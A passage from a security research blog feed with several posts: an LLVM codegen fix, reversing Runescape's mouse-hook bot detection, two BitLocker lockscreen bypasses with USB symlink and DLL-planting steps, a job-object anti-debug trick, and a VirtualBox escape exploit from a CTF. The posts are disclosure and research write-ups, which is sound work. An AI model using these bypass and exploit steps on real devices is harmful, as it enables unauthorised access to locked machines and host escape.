        movss   xmm0, dword ptr [rip + .LCPI1_1]  # xmm0 = mem[0],zero,zero,zero
        minss   xmm0, xmm1
        ret

Fix 2: LLVM

A much more general approach is fixing the code generation issue in LLVM itself, which could be as simple as this:

diff --git a/llvm/lib/Analysis/Loads.cpp b/llvm/lib/Analysis/Loads.cpp
index d8f954f575838d9886fce0df2d40407b194e7580..affb55c7867f48866045534d383b4d7ba19773a3 100644
--- a/llvm/lib/Analysis/Loads.cpp
+++ b/llvm/lib/Analysis/Loads.cpp
@@ -103,6 +103,14 @@ static bool isDereferenceableAndAlignedPointer(
         CtxI, DT, TLI, Visited, MaxDepth);
   }
 
+  // For select instructions, both operands need to be dereferenceable.
+  if (const SelectInst *SelInst = dyn_cast<SelectInst>(V))
+    return isDereferenceableAndAlignedPointer(SelInst->getOperand(1), Alignment,
+                                              Size, DL, CtxI, DT, TLI,
+                                              Visited, MaxDepth) &&
+           isDereferenceableAndAlignedPointer(SelInst->getOperand(2), Alignment,
+                                              Size, DL, CtxI, DT, TLI,
+                                              Visited, MaxDepth);
   // For gc.relocate, look through relocations
   if (const GCRelocateInst *RelocateInst = dyn_cast<GCRelocateInst>(V))
     return isDereferenceableAndAlignedPointer(RelocateInst->getDerivedPtr(),

All it does is add select instructions to the list of instruction types to consider potentially dereferenceable. Though it seems to fix the issue (and alive2 seems to like it), this is otherwise untested. Also, the codegen still isn’t perfect. Though the redundant memory accesses are removed, there are still many more instructions than in our libcxx fix (and Rust’s implementation):

.LCPI0_0:
        .long   0x3f800000                        # float 1
.LCPI0_1: 
        .long   0xbf800000                        # float -1
clamp2(float):                                    # @clamp2(float)
        movss   xmm1, dword ptr [rip + .LCPI0_0]  # xmm1 = mem[0],zero,zero,zero
        minss   xmm1, xmm0 
        movss   xmm2, dword ptr [rip + .LCPI0_1]  # xmm2 = mem[0],zero,zero,zero
        cmpltss xmm0, xmm2
        movaps  xmm3, xmm0
        andnps  xmm3, xmm1
        andps   xmm0, xmm2
        orps    xmm0, xmm3
        ret

However, this is because of the ternary operators done in the original libcxx clamp:

template<class _Tp, class _Compare>
const _Tp& clamp(const _Tp& __v, const _Tp& __lo, const _Tp& __hi, _Compare __comp)
{
    _LIBCPP_ASSERT(!__comp(__hi, __lo), "Bad bounds passed to std::clamp");
    return __comp(__v, __lo) ? __lo : __comp(__hi, __v) ? __hi : __v;

}

The reason this doesn’t look as good is because LLVM needs to store the original value of __v for the second comparison. Due to this, it then can’t optimize the second part of this computation into a maxss as that would produce different behavior when __lo is greater than __hi and __v is negative.

const float& ref_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
}

const float& better_ref_clamp(const float& v, const float& lo, const float& hi) {
    const float *out;
    out = (v < lo) ? &lo : &v;
    out = (*out > hi) ? &hi : out;
    return *out;
}

int main() {
    printf("%f\n", ref_clamp(-2.f, 1.f, -1.f));        // this prints 1.000
    printf("%f\n", better_ref_clamp(-2.f, 1.f, -1.f)); // this prints -1.000
}

Even though we know this is undefined behavior in C++, LLVM doesn’t have enough information to know that. Adjusting code generation accordingly would be no easy task either. Despite all of this though, it does show how versatile LLVM truly is; relatively simple changes can have significant results.

How Runescape catches botters, and why they didn’t catch me

3 April 2021 at 23:00
By: vmcall

Player automation has always been a big concern in MMORPGs such as World of Warcraft and Runescape, and this kind of game-hacking is very different from traditional cheats in for example shooter games.

One weekend, I decided to take a look at the detection systems put in place by Jagex to prevent player automation in Runescape.

Botting

For the past months, an account named sch0u has been playing on world 67 around the clock doing mundane tasks such as killing mobs or harvesting resources. At first glance, this account looks just like any other player, but there is one key difference: it’s a bot.

I started this bot back in October with the goal of testing the limits of their bot detection system. I tried to find information online on how Jagex combats these botters, and only found videos of commercial bots bragging about how their mouse movement systems are indistinguishable from humans.

Therefore, the only thing I could deduce was that mouse movement matters, or does it?

Heuristics!

I started by analyzing the Runescape client to confirm this theory, and quickly noticed a global called hhk set shortly launch.

const auto module_handle = GetModuleHandleA(0);
hhk = SetWindowsHookExA(WH_MOUSE_LL, rs::mouse_hook_handler, module_handle, 0);

This installs a low level hook on the mouse by appending to the system-wide hook chain. This allows applications on Windows to intercept all mouse events, whether or not the events are related to your application. Low level hooks are frequently used by keyloggers, but have legitimate use cases such as heuristics like the aforementioned mouse hook.

The Runescape mouse handler is quite simple in its essence (the following pseudocode has been beautified by hand):

LRESULT __fastcall rs::mouse_hook_handler(int code, WPARAM wParam, LPARAM lParam)
{
  if ( rs::client::singleton )
  {
      // Call the internal logging handler
      rs::mouse_hook_handler_internal(rs::client::singleton->window_ctx, wParam, lParam);
  }
  // Pass the information to the next hook on the system
  return CallNextHookEx(hhk, code, wParam, lParam);
}
void __fastcall rs::mouse_hook_handler_internal(rs::window_ctx *window_ctx, __int64 wparam, _DWORD *lparam)
{
  // If the mouse event happens outside of the Runescape window, don't log it.
  if (!window_ctx->event_inside_of_window(lparam))
  {
    return;
  }

  switch (wparam)
  {
    case WM_MOUSEMOVE:
      rs::heuristics::log_movement(lparam);
      break;
    
    case WM_LBUTTONDOWN:
    case WM_LBUTTONDBLCLK:
    case WM_RBUTTONDOWN:
    case WM_RBUTTONDBLCLK:
    case WM_MBUTTONDOWN:
    case WM_MBUTTONDBLCLK:
      rs::heuristics::log_button(lparam);
      break;
  }
}

for bandwidth reasons, these rs::heuristics::log_* functions use simple algorithms to skip event data that resembles previous logged events.

This event data is later parsed by the function rs::heuristics::process, which is called every frame by the main render loop.


void __fastcall rs::heuristics::process(rs::heuristic_engine *heuristic_engine)
{
  // Don't process any data if the player is not in a world
  auto client = heuristic_engine->client;
  if (client->state != STATE_IN_GAME)
  {
    return;
  }

  // Make sure the connection object is properly initialised
  auto connection = client->network->connection;
  if (!connection || connection->server->mode != SERVER_INITIALISED)
  {
    return;
  }

  // The following functions parse and pack the event data, and is later sent
  // by a different component related to networking that has a queue system for
  // packets.

  // Process data gathered by internal handlers
  rs::heuristics::process_source(&heuristic_engine->event_client_source);

  // Process data gathered by the low level mouse hook
  rs::heuristics::process_source(&heuristic_engine->event_hook_source);
}

Away from keyboard?

While reversing, I put effort into knowing the relevance of the function I am looking at, primarily by hooking or patching the function in question. You can usually deduce the relevance of a function by rendering it useless and observing the state of the software, and this methodology lead to an interesting observation.

By preventing the game from calling the function rs::heuristics::process, I didn’t immediately notice anything, but after exactly five minutes, I was logged out of the game. Apparently, Runescape decides if a player is inactive by solely looking at the heuristic data sent to the server by the client, even though you can play the game just fine. This raised a new question: If the server doesn’t think I am playing, does it think I am botting?.

This lead to spending a few days reverse engineering the networking layer of the game, which resulted in my ability to bot almost anything using only network packets.

To prove my theory, I botted twenty four hours a day, seven days a week, without ever moving my mouse. After doing this for thousands of hours, I can safely state that their bot detection either relies on the heuristic event data sent by the client, or is only run when the player is not “afk”. Any player that manages to play without moving their mouse should be banned immediately, thus making this oversight worth revisiting.

BitLocker touch-device lockscreen bypass

29 January 2021 at 23:00

Microsoft has for the past years done a great job at hardening the Windows lockscreen, but after Jonas published CVE-2020-1398, I put effort into weaponizing an old bug I had found in Windows Touch devices.

These exploits rely on the fundamental design of the Windows Lockscreen, where the instance that prompts the user for password runs with SYSTEM privileges. This means that even though most of the UI is blocked, you can always find a way to do some damage when there are options like “Reset password”

Clicking this button will result in a new user being created with the name of defaultuser1, defaultuser100000, defaultuser100001 (et cetera), and a new instance of WWAHost asking for user account credentials will be spawned. If everything is in order, it will ask you for a new pin, otherwise you will be stuck in this instance.

Bypassing BitLocker in 5 easy steps

  • Connect a physical keyboard
  • Enable the narrator
  • Select “I have forgotten my password.” and “Text <phonenumber>”
  • Change the size of the on-screen keyboard and open keyboard settings
  • Interact with the hidden settings window to execute our payload

Constraints

To exploit this vulnerability, you will need:

  1. A surface touchscreen device. I used a surface book 2 15’ (Running up-to-date Windows 10 20H2 with BitLocker enabled)
  2. A external keyboard
  3. A flash drive containing your payload.

Keyboard confusion

By connecting a external keyboard to our Surface device, we have the capability using both the on-screen and the physical keyboard. This is necessary to abuse certain functionality that allows us to bypass the lockscreen.

Narration

Windows includes various accessibility features such as narration. This functionality allows us to operate on hidden UI elements, as the narrator will read any selected element out loud, visible or not. Turn it on by clicking Windows+U and selecting “Enable narrator”

I forgot my password

A Forgotten password is one of the few cases you would ever do anything but login on the Windows lockscreen. The first part of our bypass requires you to select “I have forgotten my password.” on the login screen. This will open up a Microsoft Account login form, where you can choose to recover your password by texting a certain phone number. Selecting this opens up a text bar where you would normally type in the full recovery phone number, but in our case that is not the point. By opening this text bar, we can make the touch device display an on screen keyboard, which was the goal all along. With this software keyboard, you can change the size of the keyboard by hitting the options button in the top left, choose the largest keyboard available.

Now you should have a large software keyboard where you can open the settings menu:

After initialising the launch of keyboard settings, there is a small time frame where you can double click on this grey area here:

If you did this successfully, the narrator should explicitly say “Settings window”

Navigating settings

You wouldn’t think you could much with a hidden settings window on a locked Windows device, but you can actually navigate said window with a external keyboard. While holding down the Caps Lock key, the arrow keys and the tab key can be used to navigate UI elements.

One weaponization of this is going to Autoplay -> Removable drives -> Open folder to view files. This launches File Explorer, where you can execute windows binaries from a usb thumb-drive.

Disclosure

I reported the issue to MSRC, but they ignored the bug report citing a need of PoC, which I had already provided, they had also expressed disbelief towards the exploitability of this bug.

Demonstration

Process on a diet: anti-debug using job objects

20 January 2021 at 23:00
By: jm

In the second iteration of our anti-debug series for the new year, we will be taking a look at one of my favorite anti-debug techniques. In short, by setting a limit for process memory usage that is less or equal to current memory usage, we can prevent the creation of threads and modification of executable memory.

Job Object Basics

While job objects may seem like an obscure feature, the browser you are reading this article on is most likely using them (if you are a Windows user, of course). They have a ton of capabilities, including but not limited to:

  • Disabling access to user32 functionality.
  • Limiting resource usage like IO or network bandwidth and rate, memory commit and working set, and user-mode execution time.
  • Assigning a memory partition to all processes in the job.
  • Offering some isolation from the system by “upgrading” the job into a silo.

As far as API goes, it is pretty simple - creation does not really stand out from other object creation. The only other APIs you will really touch is NtAssignProcessToJobObject whose name is self-explanatory, and NtSetInformationJobObject through which you will set all the properties and capabilities.

NTSTATUS NtCreateJobObject(HANDLE*            JobHandle,
                           ACCESS_MASK        DesiredAccess,
                           OBJECT_ATTRIBUTES* ObjectAttributes);

NTSTATUS NtAssignProcessToJobObject(HANDLE JobHandle, HANDLE ProcessHandle);

NTSTATUS NtSetInformationJobObject(HANDLE JobHandle, JOBOBJECTINFOCLASS InfoClass,
                                   void*  Info,      ULONG              InfoLen);

The Method

With the introduction over, all one needs to create a job object, assign it to a process, and set the memory limit to something that will deny any attempt to allocate memory.

HANDLE job = nullptr;
NtCreateJobObject(&job, MAXIMUM_ALLOWED, nullptr);

NtAssignProcessToJobObject(job, NtCurrentProcess());

JOBOBJECT_EXTENDED_LIMIT_INFORMATION limits;
limits.ProcessMemoryLimit               = 0x1000;
limits.BasicLimitInformation.LimitFlags = JOB_OBJECT_LIMIT_PROCESS_MEMORY;
NtSetInformationJobObject(job, JobObjectExtendedLimitInformation,
                          &limits, sizeof(limits));

That is it. Now while it is sufficient to use only syscalls and write code where you can count the number of dynamic allocations on your fingers, you might need to look into some of the affected functions to make a more realistic program compatible with this technique, so there is more work to be done in that regard.

The implications

So what does it do to debuggers and alike?

  • Visual Studio - unable to attach.
  • WinDbg
    • Waits 30 seconds before attaching.
    • cannot set breakpoints.
  • x64dbg
    • will not be able to attach (a few months old).
    • will terminate the process of placing a breakpoint (a week or so old).
    • will fail to place a breakpoint.

Please do note that the breakpoint protection only works for pages that are not considered private. So if you compile a small test program whose total size is less than a page and have entry breakpoints or count it into the private commit before reaching anti-debug code - it will have no effect.

Conclusion

Although this method requires you to be careful with your code, I personally love it due to its simplicity and power. If you cannot see yourself using this, do not worry! You can expect the upcoming article to contain something that does not require any changes to your code.

BitLocker Lockscreen bypass

15 January 2021 at 23:00
By: Jonas L

BitLocker is a modern data protection feature that is deeply integrated in the Windows kernel. It is used by many corporations as a means of protecting company secrets in case of theft. Microsoft recommends that you have a Trusted Platform Module which can do some of the heavy cryptographic lifting for you.

Bypassing BitLocker in 6 easy steps

Given a Windows 10 system without known passwords and a BitLocker-protected hard drive, an administrator account could be adding by doing the following:

  • At the sign-in screen, select “I have forgotten my password.”
  • Bypass the lock and enable autoplay of removable drives.
  • Insert a USB stick with my .exe and a junction folder.
  • Run executable.
  • Remove the thumb drive and put it back in again, go to the main screen.
  • From there launch narrator, that will execute a DLL payload planted earlier.

Now a user account is added called hax with password “hax” with membership in Administrators. To update the list with accounts to log into, click I forgot my password and then return to the main screen.

Bypassing the lock screen

First, we select the “I have forgotten my password/PIN” option. This option launches an additional session, with an account that gets created/deleted as needed; the user profile service calls it a default-account. It will have the first available name of defaultuser1, defaultuser100000, defaultuser100001, etc.

To escape the lock, we have to use the Narrator because if we manage to launch something, we cannot see it, but using the Narrator, we will be able to navigate it. However, how do we launch something?

If we smash shift 5 times in quick succession, a link to open the Settings app appears, and the link actually works. We cannot see the launched Settings app. Giving the launched app focus is slightly tricky; you have to click the link and then click a place where the launched app would be visible with the correct timing. The easiest way to learn to do it is, keep clicking the link roughly 2 times a second. The sticky keys windows will disappear. Keep clicking! You will now see a focus box is drawn in the middle of the screen. That was the Settings app, and you have to stop clicking when it gets focus.

Now we can navigate the Settings app using CapsLock + Left Arrow, press that until we reach Home. Now, when Home has focus, hold down Caps Lock and press Enter. Using CapsLock + Right Arrow navigate to Devices and CapsLock + Enter when it is in focus.

Now navigate to AutoPlay, CapsLock + Enter and choose “Open Folder to view files (File Explorer).” Now insert the prepared USB drive, wait some seconds, the Narrator will announce the drive has been opened, and the window is focused. Now select the file Exploit.exe and execute it with CapsLock + Enter. That is arbitrary code execution, ladies and gentlemen, without using any passwords. However, we are limited by running as the default profile.

I have made a video with my phone, as I cannot take screenshots.

Elevation of privilege

When a USB stick is mounted, BitLocker will create a directory named ClientRecoveryPasswordRotation in System Volume Information and set permissions to:

NT AUTHORITY\Authenticated Users:(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)

To redirect the create operation, a symbolic link in the NT namespace is needed as that allows us to control the filename, and the existence of the link does not abort the operation as it is still creating the directory.

Therefore, take a USB drive and make \System Volume Information a mount point targeting \RPC Control. Then make a symbolic link in \RPC Control\ClientRecoveryPasswordRotation targetting \??\C:\windows\system32\Narrator.exe.local. If the USB stick is reinserted then the folder C:\windows\system32\Narrator.exe.local will be created with permissions that allows us to create a subdirectory:

amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.657_none_e6c5b579130e3898

Inside this subdirectory, we drop a payload DLL named comctl32.dll. Next time the Narrator is triggered, it will load the DLL. By the way, I chose the Narrator as that is triggerable from the login screen as a system service and is not auto-loaded, so if anything goes wrong, we can still boot.

Combining them

The ClientRecoveryPasswordRotation exploit to work requires a symbolic link in \RPC Control. The executable on the USB drive creates the link using two calls to DefineDosDevice, making the link permanent so they can survive a logout/in if needed.

Then a loop is started in which the executable will:

  • Try to create the subdirectory.
  • Plant the payload comctl32.dll inside it.

It is easy to see when the loop is running because the Narrator will move its focus box and say “access denied” every second. We can now use the link created in RPC Control. Unplug the USB stick and reinsert it. The writeable directory will be created in System32; on the next loop iteration, the payload will get planted, and exploit.exe will exit. To test if the exploit has been successful, close the Narrator and try to start it again.

If the narrator does not work, it is because the DLL is planted, and Narrator executes it, but it fails to add an account because it is launched as defaultuser1. When the payload is planted, you will need to click back to the login screen and start Narrator; 3 beeps should play, and a message box saying the DLL has been loaded as SYSTEM should show. Great! The account has been created, but it is not in the list. Press “I forgot my password” and click back to update the list.

A new account named hax should appear, with password hax.

Making a malicious USB

I used these steps to arm the USB device

C:\Users\jonas>format D: /fs:ntfs /q
Insert new disk for drive D:
Press ENTER when ready...
-----
File System: NTFS.
Quick Formatting 30.0 GB
Volume label (32 characters, ENTER for none)?
Creating file system structures.
Format complete.
30.0 GB total disk space.
30.0 GB are available.

Now, we need to elevate to admin to delete System Volume Information.

C:\Users\jonas>d:
D:\>takeown /F "System Volume Information"

This results in

SUCCESS: The file (or folder): "D:\System Volume Information" now owned by user "DESKTOP-LTJEFST\jonas".

We can then

D:\>icacls "System Volume Information" /grant Everyone:(F)
Processed file: System Volume Information
Successfully processed 1 files; Failed processing 0 files
D:\>rmdir /s /q "System Volume Information"

We will use James Forshaw’s tool (attached) to create the mount point.

D:\>createmountpoint "System Volume Information" "\RPC Control"

Then copy the attached exploit.exe to it.

D:\>copy c:\Users\jonas\source\repos\exploitKit\x64\Release\exploit.exe .
1 file(s) copied.

Patch

I disclosed this vulnerability and it was assigned CVE-2020-1398. Its patch can be found here

Escaping VirtualBox 6.1: Part 1

14 January 2021 at 23:00

This post is about a VirtualBox escape for the latest currently available version (VirtualBox 6.1.16 on Windows). The vulnerabilities were discovered and exploited by our team Sauercl0ud as part of the RealWorld CTF 2020/2021.

The vulnerability was known to the organizers, requires the guest to be able to insert kernel modules and isn’t exploitable on default configurations of VirtualBox so the impact is very limited.

Many thanks to the organizers for hosting this great competition, especially to ChenNan for creating this challenge, M4x for always being helpful, answering our questions and sitting with us through the many demo attempts and of course all the people involved in writing the exploit.

Let’s get to some pwning :D

Discovering the Vulnerability

The challenge description already hints at where a bug might be:

Goal:

Please escape VirtualBox and spawn a calc(“C:\Windows\System32\calc.exe”) on the host operating system.

You have the full permissions of the guest operating system and can do anything in the guest, including loading drivers, etc.

But you can’t do anything in the host, including modifying the guest configuration file, etc.

Hint: SCSI controller is enabled and marked as bootable.

Environment:

In order to ensure a clean environment, we use virtual machine nesting to build the environment. The details are as follows:

  • VirtualBox:6.1.16-140961-Win_x64.
  • Host: Windows10_20H2_x64 Virtual machine in Vmware_16.1.0_x64.
  • Guest: Windows7_sp1_x64 Virtual machine in VirtualBox_6.1.16_x64.

The only special thing about the VM is that the SCSI driver is loaded and marked bootable so that’s the place for us to start looking for vulnerabilities.

Here are the operations the SCSI device supports:

// /src/VBox/Devices/Storage/DevBusLogic.cpp
    
    // [...]

    if (fBootable)
    {
        /* Register I/O port space for BIOS access. */
        rc = PDMDevHlpIoPortCreateExAndMap(pDevIns, BUSLOGIC_BIOS_IO_PORT, 4 /*cPorts*/, 0 /*fFlags*/,
                                           buslogicR3BiosIoPortWrite,       // Write a byte
                                           buslogicR3BiosIoPortRead,        // Read a byte
                                           buslogicR3BiosIoPortWriteStr,    // Write a string
                                           buslogicR3BiosIoPortReadStr,     // Read a string
                                           NULL /*pvUser*/,
                                           "BusLogic BIOS" , NULL /*paExtDesc*/, &pThis->hIoPortsBios);
        // [...]
    }
    // [...]

The SCSI device implements a simple state machine with a global heap allocated buffer. When initiating the state machine, we can set the buffer size and the state machine will set a global buffer pointer to point to the start of said buffer. From there on, we can either read one or more bytes, or write one or more bytes. Every read/write operation will advance the buffer pointer. This means that after reading a byte from the buffer, we can’t write that same byte and vice versa, because the buffer pointer has already been advanced.

While auditing the vboxscsiReadString function, tsuro and spq found something interesting:

// src/VBox/Devices/Storage/VBoxSCSI.cpp

/**
 * @retval VINF_SUCCESS
 */
int vboxscsiReadString(PPDMDEVINS pDevIns, PVBOXSCSI pVBoxSCSI, uint8_t iRegister,
                       uint8_t *pbDst, uint32_t *pcTransfers, unsigned cb)
{
    RT_NOREF(pDevIns);
    LogFlowFunc(("pDevIns=%#p pVBoxSCSI=%#p iRegister=%d cTransfers=%u cb=%u\n",
                 pDevIns, pVBoxSCSI, iRegister, *pcTransfers, cb));

    /*
     * Check preconditions, fall back to non-string I/O handler.
     */
    Assert(*pcTransfers > 0);

    /* Read string only valid for data in register. */
    AssertMsgReturn(iRegister == 1, ("Hey! Only register 1 can be read from with string!\n"), VINF_SUCCESS);

    /* Accesses without a valid buffer will be ignored. */
    AssertReturn(pVBoxSCSI->pbBuf, VINF_SUCCESS);

    /* Check state. */
    AssertReturn(pVBoxSCSI->enmState == VBOXSCSISTATE_COMMAND_READY, VINF_SUCCESS);
    Assert(!pVBoxSCSI->fBusy);

    RTCritSectEnter(&pVBoxSCSI->CritSect);
    /*
     * Also ignore attempts to read more data than is available.
     */
    uint32_t cbTransfer = *pcTransfers * cb;
    if (pVBoxSCSI->cbBufLeft > 0)
    {
        Assert(cbTransfer <= pVBoxSCSI->cbBuf);     // --- [1] ---
        if (cbTransfer > pVBoxSCSI->cbBuf)
        {
            memset(pbDst + pVBoxSCSI->cbBuf, 0xff, cbTransfer - pVBoxSCSI->cbBuf);
            cbTransfer = pVBoxSCSI->cbBuf;  /* Ignore excess data (not supposed to happen). */
        }

        /* Copy the data and adance the buffer position. */
        memcpy(pbDst, 
               pVBoxSCSI->pbBuf + pVBoxSCSI->iBuf,  // --- [2] ---
               cbTransfer);

        /* Advance current buffer position. */
        pVBoxSCSI->iBuf      += cbTransfer;
        pVBoxSCSI->cbBufLeft -= cbTransfer;         // --- [3] ---

        /* When the guest reads the last byte from the data in buffer, clear
           everything and reset command buffer. */

        if (pVBoxSCSI->cbBufLeft == 0)              // --- [4] ---
            vboxscsiReset(pVBoxSCSI, false /*fEverything*/);
    }
    else
    {
        AssertFailed();
        memset(pbDst, 0, cbTransfer);
    }
    *pcTransfers = 0;
    RTCritSectLeave(&pVBoxSCSI->CritSect);

    return VINF_SUCCESS;
}

We can fully control cbTransfer in this function. The function initially makes sure that we’re not trying to read more than the buffer size [1]. Then, it copies cbTransfer bytes from the global buffer into another buffer [2], which will be sent to the guest driver. Finally, cbTransfer bytes get subtracted from the remaining size of the buffer [3] and if that remaining size hits zero, it will reset the SCSI device and require the user to reinitiate the machine state, before reading any more bytes.

So much for the logic, but what’s the issue here? There is a check at [1] that ensures no single read operation reads more than the buffer’s size. But this is the wrong check. It should verify, that no single read can read more than the buffer has left. Let’s say we allocate a buffer with a size of 40 bytes. Now we call this function to read 39 bytes. This will advance the buffer pointer to point to the 40th byte. Now we call the function again and tell it to read 2 more bytes. The check in [1] won’t bail out, since 2 is less than the buffer size of 40, however we will have read 41 bytes in total. Additionally, this will cause the subtraction in [3] to underflow and cbBufLeft will be set to UINT32_MAX-1. This same cbBufLeft will be checked when doing write operations and since it is very large now, we’ll be able to also write bytes that are outside of our buffer.

Getting OOB read/write

We understand the vulnerability, so it’s time to develop a driver to exploit it. Ironically enough, the “getting a driver to build” part was actually one of the hardest (and most annoying) parts of the exploit development. malle got to building VirtualBox from source in order for us to have symbols and a debuggable process while 0x4d5a came up with the idea of using the HEVD driver as a base for us to work with, since it does some similar things to what we need. Now let’s finally start writing some code.

Here’s how we triggered the bug:

void exploit() {
    static const uint8_t cdb[1] = {0};
    static const short port = 0x434;
    static const uint32_t buffer_size = 1024;

    // reset the state machine
    __outbyte(port+3, 0);

    // initiate a write operation
    __outbyte(port+0, 0); // TargetDevice (0)
    __outbyte(port+0, 1); // direction (to device)
    
    __outbyte(port+0, ((buffer_size >> 12) & 0xf0) | (sizeof(cdb) & 0xf)); // buffer length hi & cdb length
    __outbyte(port+0, buffer_size);                                        // bugger length low
    __outbyte(port+0, buffer_size >> 8);                                   // buffer length mid
    
    for(int i = 0; i < sizeof(cdb); i++)
        __outbyte(port+0, cdb[i]);


    // move the buffer pointer to 8 byte after the buffer and the remaining bytes to -8
    char buf[buffer_size];
    __inbytestring(port+1, buf, buffer_size - 1)    // Read bufsize-1
    __inbytestring(port+1, buf, 9)                  // Read 9 more bytes

    for(int i = 0; i < sizeof(buf); i += 4)
        *((uint32_t*)(&buf[i])) = 0xdeadbeef
    for(int i = 0; i < 10000; i++)
        __outbytestring(port+1, buf, sizeof(buf))
}

The driver first has to initiate the SCSI state machine with a bufsize. Then we read bufsize-1 bytes and then we read 9 bytes. We chose 9 instead of 2 byte in order to have the buffer pointer 8 byte aligned after the overflow. Finally, we overwrite the next 10000kb after our allocated buffer+8 with 0xdeadbeef.

After loading this driver in the win7 guest, this is what we get:

As expected, the VM crashes because we corrupted the heap. Now we know that our OOB read/write works and since working with drivers was annoying, we decided to modify the driver one last time to expose the vulnerability to user-space. The driver was modified to accept this Req struct via an IOCTL:

enum operations {
    OPERATION_OUTBYTE = 0,
    OPERATION_INBYTE = 1,
    OPERATION_OUTSTR = 2,
    OPERATION_INSTR = 3,
};

typedef struct {
    volatile unsigned int port;
    volatile unsigned int operation;
    volatile unsigned int data_byte_out;
} Req;

This enables us to use the driver as a bridge to communicate with the SCSI device from any user-space program. This makes exploit prototyping a whole lot faster and has the added benefit of removing the need to touch Windows drivers ever again (well, for the rest of this exploit anyway :D).

The bug gives us a liner heap OOB read/write primitive. Our goal is to get from here to arbitrary code execution so let’s put this bug to use!

Leaking vboxc.dll and heap addresses

We’re able to dump heap data using our OOB read but we’re still far from code execution. This is a good point to start leaking addresses. The least we’ll require for nice exploitation is a code leak (i.e. leaking the address of any dll in order to get access to gadgets) and a heap address leak to facilitate any post exploitation we might want to do.

This calls for a heap spray to get some desired objects after our leak object to read their pointers. We’d like the objects we spray to tick the following boxes:

  1. Contains a pointer into a dll
  2. Contains a heap address
  3. (Contains some kind of function pointer which might get useful later on)

After going through some options, we eventually opted for an HGCMMsgCall spray. Here’s it’s (stripped down) structure. It’s pretty big so I removed any parts that we don’t care about:

class HGCMMsgCall: public HGCMMsgHeader
{
    // A list of parameters including a 
    // char[] with controlled contents
    VBOXHGCMSVCPARM *paParms;
    
    // [...]
};

class HGCMMsgHeader: public HGCMMsgCore
{
    public:
        // [...]
        /* Port to be informed on message completion. */
        PPDMIHGCMPORT pHGCMPort;
};

typedef struct PDMIHGCMPORT
{
    // [...]
    /**
     * Checks if @a pCmd was cancelled.
     *
     * @returns true if cancelled, false if not.
     * @param   pInterface          Pointer to this interface.
     * @param   pCmd                The command we're checking on.
     */
    DECLR3CALLBACKMEMBER(bool, pfnIsCmdCancelled,(PPDMIHGCMPORT pInterface, PVBOXHGCMCMD pCmd));
    // [...]

} PDMIHGCMPORT;

class HGCMMsgCore : public HGCMReferencedObject
{
    private:
        // [...]
        /** Next element in a message queue. */
        HGCMMsgCore *m_pNext;
        /** Previous element in a message queue.
         *  @todo seems not necessary. */
        HGCMMsgCore *m_pPrev;
        // [...]
};

It contains a VTable pointer, two heap pointers (m_pNext and m_pPrev) because HGCMMsgCall objects are managed in a doubly linked list and it has a callback function pointer in m_pfnCallback so HGCMMsgCall definitely fits the bill for a good spray target. Another nice thing is that we’re able to call the pHGCMPort->pfnIsCmdCancelled pointer at any point we like. This works because this pointer gets invoked on all the already allocated messages, whenever a new message is created. HGCMMsgCall’s size is 0x70, so we’ll have to initiate the SCSI state machine with the same size to ensure our buffer gets allocated in the same heap region as our sprayed objects.

Conveniently enough, niklasb has already prepared a function we can borrow to spray HGCMMsgCall objects.

Calling niklas’ wait_prop function will allocate a HGCMMsgCall object with a controlled pszPatterns field. This char array is very useful because it is referenced by the sprayed objects and can be easily identified on the heap.

Spraying on a Low-fragmentation Heap can be a little tricky but after some trial and error we got to the following spray strategy:

  1. We iterate 64 times
  2. Each time we create a client and spray 16 HGCMMsgCalls

That way, we seemed to reliably get a bunch of the HGCMMsgCalls ahead of our leak object which allows us to read and write their fields.

First things first: getting the code leak is simple enough. All we have to do is to read heap memory until we find something that matches the structure of one of our HGCMMsgCall and read the first quad-word of said object. The VTable points into VBoxC.dll so we can use this leak to calculate the base address of VBoxC.dll for future use.

Getting the heap leak is not as straight forward. We can easily read the m_pNext or m_pPrev fields to get a pointer to some other HGCMMsgCall object but we don’t have any clue about where that object is located relatively to our current buffer position. So reading m_pNext and m_pPrev of one object is useless… But what if we did the same for a second object? Maybe you can already see where this is going. Since these objects are organized in a doubly linked list, we can abuse some of their properties to match an object A to it’s next neighbor B.

This works because of this property:

addr(B) - addr(A) == A->m_pNext - B->m_pPrev

To get the address of B, we have to do the following:

  1. Read object A and save the pointers
  2. Take note of how many bytes we had to read until we found the next object B in a variable x
  3. Read object B and save the pointers
  4. If A->m_pNext - B->m_pPrev == x we most likely found the right neighbor and know that B is at A->m_pNext. If not, we just keep reading objects

This is pretty fast and works somewhat reliably. Equipped with our heap address and VBoxC.dll base address leak, we can move on to hijacking the execution flow.

Getting RIP control

Remember those pfnIsCmdCancelled callbacks? Those will make for a very short “Getting RIP control” section… :P

There’s really not that much to this part of the exploit. We only have to read heap data until we find another one of our HGCMMsgCalls and overwrite m_pfnCallback. As soon as a new message gets allocated, this method is called on our corrupted object with a malicious pHgcmPort->pfnIsCmdCancelled field.

/**
 * @interface_method_impl{VBOXHGCMSVCHELPERS,pfnIsCallCancelled}
 */
/* static */ DECLCALLBACK(bool) HGCMService::svcHlpIsCallCancelled(VBOXHGCMCALLHANDLE callHandle)
{
    HGCMMsgHeader *pMsgHdr = (HGCMMsgHeader *)callHandle;
    AssertPtrReturn(pMsgHdr, false);

    PVBOXHGCMCMD pCmd = pMsgHdr->pCmd;
    AssertPtrReturn(pCmd, false);

    PPDMIHGCMPORT pHgcmPort = pMsgHdr->pHGCMPort;   // We corrupted pHGCMPort
    AssertPtrReturn(pHgcmPort, false);

    return pHgcmPort->pfnIsCmdCancelled(pHgcmPort, pCmd);   // --- Profit ---
}

Internally, svcHlpIsCallCancelled will load pHgcmPort into r8 and execute a jmp [r8+0x10] instruction. Here’s what happens if we corrupt m_pfnCallback with 0x0000000041414141:

Code execution

At this point, we are able to redirect code execution to anywhere we want. But where do we want to redirect it to? Oftentimes getting RIP control is already enough to solve CTF pwnables. Glibc has these one-gadgets which are basically addresses you jump to, that will instantly give you a shell. But sadly there is no leak-kernel32dll-set-rcx-to-calc-and-call-WinExec one-gadget in VBoxC.dll which means we’ll have to get a little creative once more. ROP is not an option because we don’t have stack control so the only thing left is JOP(Jump-Oriented-Programming).

